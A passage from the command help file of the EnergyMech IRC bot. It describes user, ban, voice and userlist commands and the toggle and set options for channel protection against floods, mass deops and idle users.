Sets the topic on a certain channel
See also: RT, MODE
:unban
Usage: UNBAN [channel] [nick|userhost]
Unbans someone on a certain channel
Note: If no nick/userhost is given, you are unbanned
See also: BAN, BANLIST
:unvoice
Usage: UNVOICE [channel] [nick|mask [...]]
Removes voice from user or users matching the given
nick!user@host mask.
See also: VOICE, MODE
:up
Usage: UP [channel]
Ops you on a channel
See also: OP, DOWN, MODE
:uptime
Usage: UPTIME
Shows how long the bot has been running.
See also: ONTIME
:usage
Usage: USAGE
Show the usage syntax for a specified command.
See also: HELP
:user
Usage: USER
Change user settings. Prefix flags with a "-" to disable them
or a "+" to enable them.
Flags:
AO Enable or disable autoop
AV Enable or disable autovoice
ECHO Turn on or off partyline echo
P
If disabling, level is not needed.
SH Enable or disable sharing the user
Example: USER owner +sh +ao -av
Enables user sharing, autoop and disables autovoice
for user "owner".
:userhost
Usage: USERHOST
Returns the userhost of a person.
See also: WHOIS
:userlist
Usage: USERLIST [+minlevel] [-maxlevel] [#channel] [usermask] [-B] [-C]
Shows the userlist
Options:
+minlevel List users with access minlevel or greater.
-maxlevel List users with access maxlevel or less.
#channel List users with access on #channel.
usermask List users matching usermask.
-B List bots.
-C List channel users (users with no global access).
See also: ACCESS, USTATS
:ustats
Usage: USTATS
Show userlist information for a specific user.
See also: ACCESS, USERLIST
:ver
Usage: VER
Returns the version of EnergyMech that is running
:verify
Usage: VERIFY
Authenticate yourself with the bot.
See also: PASSWD, SETPASS
:voice
Usage: VOICE [channel] [nick|mask [...]]
Give voice to a user or users matching the given
nick!user@host mask. Defaults to giving you voice
on the channel where the command is given.
:wall
Usage: WALL [channel]
Send a message to all ops on a channel.
:who
Usage: WHO
Lists people in a channel that the bot is in now,
or was in. The optional parameters can be used to
list only ops or only non ops respectively.
If a pattern is given, only users matching the pattern
will be listed.
See also: NAMES
:whois
Usage: WHOIS
Same as the irc command.
:whom
Usage: WHOM
Show who are connected to the partyline.
:------------------------------------------------------------------------------
:// toggles //
:togaop
Usage: TOG [channel] AOP [0|1|on|off]
Toggles the auto-opping of users if verified.
:togas
Usage: TOG [channel] AS [0|1|on|off]
Toggles auto-shitlisting on a channel.
:togcc
Usage: TOG CC [0|1|on|off]
Toggles the necessity of the command character for doing commands.
:togck
Usage: TOG [channel] CK [0|1|on|off]
Toggles the kicking of CAPSers.
:togdcc
Usage: TOG DCC [0|1|on|off]
Toggles the requirement of a user needing to be on the userlist
before he/she can DCC CHAT the bot.
In other words:
When this is on, only users can DCC.
When this is off, anyone can DCC.
:togenfm
Usage: TOG [channel] ENFM [0|1|on|off]
Toggles mode enforcement on a certain channel.
See also: SETENFM
:togik
Usage: TOG [channel] IK [0|1|on|off]
Toggles the kicking of idle lusers on a certain channel.
See also: SETIKT
:togks
Usage: TOG [channel] KS [0|1|on|off]
Toggles kicking on kicksays.
:togprot
Usage: TOG [channel] PROT [0|1|on|off]
Toggles the protection of users.
:togpub
Usage: TOG [channel] PUB [0|1|on|off]
Toggles the allowance of public commands.
:togrk
Usage: TOG [channel] RK [0|1|on|off]
Toggles revenge kicking.
:togshit
Usage: TOG [channel] SHIT [0|1|on|off]
Toggles the kicking of shitlisted users.
:togso
Usage: TOG [channel] SO [0|1|on|off]
Toggles strict opping. If on, if people not in the userlist
are opped, they will be deopped.
:------------------------------------------------------------------------------
:// sets //
:setaaway
Usage: SET AAWAY
Setting for how long in minutes the bot waits idle before setting
AWAY status and a random away message. Any privmsg sent by the bot
resets the idle-timer to zero.
To disable auto-away set a value of 0.
:setaub
Usage: SET [channel] AUB
Erases old bans automatically, this sets how old they have to be.
:setavoice
Usage: SET [channel] AVOICE
Sets the autovoice level.
0 - no autovoice
1 - voice +AV users as they join
2 - voice everyone as they join
:setbanmodes
Usage: SET BANMODES
Number of MODE +/-b's that can be done at a time
:setenfm
Usage: SET [channel] ENFM
Enforces modes on a channel if a server changes them or
if a non-user changes them.
See also: TOGENFM
:setfpl
Usage: SET [channel] FPL
Sets the protection level against floods.
0 - no action against offender
1 - kick offender
2 - kickban offender
Note: After 3rd kick within 10 minutes, the person will be
sitekickbanned. After the 4th time, the person will
be shitlisted.
:setikt
Usage: SET [channel] IKT
Sets the number of minutes someone is allowed to be idle before
being kicked (if TOGIK is on).
Default is 20 minutes, range 2 - 999 minutes.
See also: TOGIK
:setmal
Usage: SET [channel] MAL
Sets the mass-action level (the level massdeop, masskick,
and masskickban will have no effect on).
:setmpl
Usage: SET [channel] MPL
Sets the protection level against massmoders.
0 - no action taken against offender
1 - kick offender
2 - kickban offender
3 - kickban and shitlist offender
:setopmodes
Usage: SET OPMODES
Number of MODE +/-o's or +/-v's that can be done at a time.
:------------------------------------------------------------------------------
:// unsorted, not up to date //
:TogTop
Usage: Tog [
Toggles the enforcement of the channel topic
:TogSD
Usage: Tog [
Toggles the deopping of non-users who are serveropped
:SetCKL
Usage: SET [
Sets the number of lines of caps allowed within a 5 second
period before the user will be kicked
Note: a line is considered all caps if 60% if it is in caps
:SetBT
Usage: Set [
Which bans to unban when ban-limit is reached
:SetMDL
Usage: Set [
Sets the the number of deops allowed during a 10 sec time
period before it is considered a massdeop
:SetMBL
Usage: Set [
Sets the the number of bans allowed during a 10 sec time
period before it is considered a massban
:SetMKL
Usage: Set [
Sets the the number of kicks allowed during a 10 sec time
period before it is considered a masskic
:SetFL
Usage: Set [
Sets the number of lines by the same person within a 10-second
period before it is considered a flood
:SetNCL
Usage: Set [
Sets the number of nick changes within a 10 second period
before it is considered nickflooding